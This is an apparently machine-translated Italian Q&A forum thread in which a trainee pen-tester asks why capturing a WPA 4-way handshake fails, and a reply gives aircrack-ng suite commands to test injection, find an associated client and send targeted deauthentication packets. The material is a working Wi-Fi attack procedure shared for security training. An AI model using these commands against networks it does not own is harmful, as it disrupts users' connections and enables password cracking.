Non riesco a proteggere un handshake WPA (handshake a 4 vie)

1

Mi sto allenando per diventare un pen-tester e sto riscontrando alcuni problemi nell'ottenere una stretta di mano a 4 vie. Io uso airodump-ng -c -w file --bssid wlo1 seguito da Aireplay-ng -0 0 -a (Mac) wlo1

Ecco tutti i passaggi che seguo:

Ifconfig wlo1
ifconfig wlo1 down
iwconfig wlo1 mode monitor
ifconfig wlo1 up
airmon-ng check wlo1
kill processes

Airodump-ng wlo1
airodump-ng -c (channel) -w (file) --bssid  wlo1 
aireplay-ng -0 0 -a (mac) wlo1

So cosa fare dopo aver ottenuto la stretta di mano, sono solo bloccato. Qualsiasi aiuto sarebbe molto apprezzato. Sto usando Fedora 25

    
posta Evan Anderson 27.05.2017 - 03:07
fonte

1 risposta

2

Per prima cosa assicurati che il tuo nic possa iniettarsi e l'ap mirato sia nel raggio di azione.

aireplay-ng -9 wlo1 

Dopo aver eseguito questo comando dovresti vedere 'Injection is working!' e l'ap mirato con un alto tasso di risposta (50 - 100%)

L'attacco di estinzione automatica invia disassocia i pacchetti ai client connessi, quindi è necessario disporre di almeno un client associato.

airodump-ng -c <ap channel> --bssid <ap mac> wlo1 

Ci dovrebbe essere almeno un mac sotto la scheda 'STATION' associata all'ap. Puoi usare questo client per un attacco mirato.

aireplay-ng -0 5 -a <ap mac> -c <client mac> wlo1

Potrebbe essere necessario eseguire il comando sopra più volte fino a quando non si ottiene un handshake.

È possibile aumentare o diminuire il numero di pacchetti di deautenticazione. A volte uno è sufficiente, a volte ne occorrono almeno dieci.

    
risposta data 27.05.2017 - 05:26
fonte

Leggi altre domande sui tag